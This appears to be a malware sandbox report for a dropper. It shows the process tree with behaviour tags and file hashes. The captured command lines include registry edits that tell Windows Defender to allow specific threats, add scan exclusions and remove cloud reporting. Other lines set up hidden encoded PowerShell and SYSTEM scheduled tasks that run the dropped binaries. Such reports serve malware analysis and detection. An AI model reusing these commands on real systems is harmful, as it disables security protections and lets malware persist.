C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4468
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3784
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4644
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AJYQrkrAhIRXC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AJYQrkrAhIRXC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CrVpqlWoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CrVpqlWoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lVrlTdgfhXOU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lVrlTdgfhXOU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQtMlHEnfKUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oQtMlHEnfKUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hfmUoVlnDXXxKeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hfmUoVlnDXXxKeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PtFLChdTWFkbMOwK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\PtFLChdTWFkbMOwK\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:323⤵PID:1068
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:324⤵PID:2676
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AJYQrkrAhIRXC" /t REG_DWORD /d 0 /reg:643⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:323⤵PID:3756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CrVpqlWoU" /t REG_DWORD /d 0 /reg:643⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:323⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR" /t REG_DWORD /d 0 /reg:643⤵PID:2704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:323⤵PID:2040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lVrlTdgfhXOU2" /t REG_DWORD /d 0 /reg:643⤵PID:3252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:323⤵PID:3364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oQtMlHEnfKUn" /t REG_DWORD /d 0 /reg:643⤵PID:4200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hfmUoVlnDXXxKeVB /t REG_DWORD /d 0 /reg:323⤵PID:4048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hfmUoVlnDXXxKeVB /t REG_DWORD /d 0 /reg:643⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR /t REG_DWORD /d 0 /reg:323⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR /t REG_DWORD /d 0 /reg:643⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PtFLChdTWFkbMOwK /t REG_DWORD /d 0 /reg:323⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\PtFLChdTWFkbMOwK /t REG_DWORD /d 0 /reg:643⤵PID:544
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geuvGLXBF" /SC once /ST 00:25:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geuvGLXBF"2⤵PID:2296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geuvGLXBF"2⤵PID:4068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wLvsIRnBfEcGhlAOV" /SC once /ST 10:45:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\iDhnHOo.exe\" 0b /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wLvsIRnBfEcGhlAOV"2⤵PID:1532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5032
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4780
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3660
-
C:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\iDhnHOo.exeC:\Windows\Temp\PtFLChdTWFkbMOwK\kDJwecmhGUrPQUQ\iDhnHOo.exe 0b /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4432 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKFjthDDlmdmBdSpYV"2⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3784
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5012
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:692
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CrVpqlWoU\RNilAv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gJECdJUNuqvNlNQ" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJECdJUNuqvNlNQ2" /F /xml "C:\Program Files (x86)\CrVpqlWoU\XdoHeCH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gJECdJUNuqvNlNQ"2⤵PID:2444
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJECdJUNuqvNlNQ"2⤵PID:1340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zMXAekEoOFzMiq" /F /xml "C:\Program Files (x86)\lVrlTdgfhXOU2\oWGlYui.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzmbNextDjATo2" /F /xml "C:\ProgramData\hfmUoVlnDXXxKeVB\oxjlSBY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CPJtugmqbghMWscDr2" /F /xml "C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\uZfAeUH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DmuWdpWCmdYRHkgJrjb2" /F /xml "C:\Program Files (x86)\AJYQrkrAhIRXC\IenZWZe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CDUwqlMPSeBRbvnPZ" /SC once /ST 11:24:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\PtFLChdTWFkbMOwK\HmNEeGIG\IJpQfHe.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "CDUwqlMPSeBRbvnPZ"2⤵PID:5068
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3788
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2176
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4796
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wLvsIRnBfEcGhlAOV"2⤵PID:1880
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\HmNEeGIG\IJpQfHe.dll",#1 /site_id 5254031⤵PID:1844
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\PtFLChdTWFkbMOwK\HmNEeGIG\IJpQfHe.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CDUwqlMPSeBRbvnPZ"3⤵PID:3416
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a4711a90e180e7705d06650267f2254a
SHA1f00a4b7fc5deab078af9a7b97689b02e9510e031
SHA25615a20f973aa6067626c3bb9b35ad4ea4ccf0105ba105bd7d09a1de4c0d8aa76e
SHA512e0c7e2ba992e40f413df2d03c8808d037bb89817136fe3efab2dad713aba7e05baa85ecb88cc29fd9a20931012889042b3a4faccfaf7931fc9e85c0fefe7c9dd
-
Filesize
2KB
MD59e24c1e6417f716f5dffd1936f3e3693
SHA14257c9de48d5d2ce6c73ffd8bba7707ee44e4bb8
SHA256cc8697494dfcfcc35ee49526c16fae9d9d5af4462a71a4b8d44991944a0bb9ee
SHA5128a673b74c57f8768f1aef7f3904d45df060e63c9a46488fb226de0d78bfc5490a3c0ebaba6f40ea67e7d500da3e5cadd224408cde2678f622dd48802f894f4b6
-
Filesize
2KB
MD59174d7b798cbc1450049bc1c58214443
SHA18360944493f0be55ba212b3564a718430a219b5e
SHA2566ad2b8682c8b335e958a0bd10f42bb61e2ca09fcedf9120ab2f3b48374543512
SHA512bc64447d2a066e836f055aca8d2566de3189373ffc534696bc4880ad0b2a9fa07aa3325932c2c090342eec9ec2cec8ddd353efa623fad1ac9c70a43ccd2d91f9
-
Filesize
2KB
MD546f5669cbb84bb202882c955886c6ad3
SHA1dc620858e37ec4a681d5fb84a1c3648a19d176bc
SHA2561199e15d9ff93a668c3e4f385c17b1ddc8d1ae9489b5aa0f2e011caf2426e203
SHA512fd96f703eb9f8330e6af3d08060fbf8f46b599c64c774623e03c89dc533343ab3e877ebc42738fc7e8700dfc61b2f17953efa2558264dfd6d622e2a166fb71bf
-
Filesize
2KB
MD55068b580b9290d3ebfd9db2218d8078e
SHA132325a8aa64f8a7e3cb2eee364035063e98a9df2
SHA256758811dda2a59fe502ed919bac2660e5a5c98698b41ec89c3d4967860b89d21a
SHA512c49fd63276e59105f51f49e7606ac35a5b36b7ab96e57d9f93768c5aee4cc7b9b7d18f5a909a73320845195b3e8a2cbd87fa71846a40b3856752fdfda8d5374d
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.3MB
MD53e2c486c6b397a3c96c5ae6c30de7924
SHA1beafeb2d21677cb2183f250812051fbc75527f4e
SHA2568dfdd352c3a42b7dd091b213852833a80cb62736948221b3300f571e353d676f
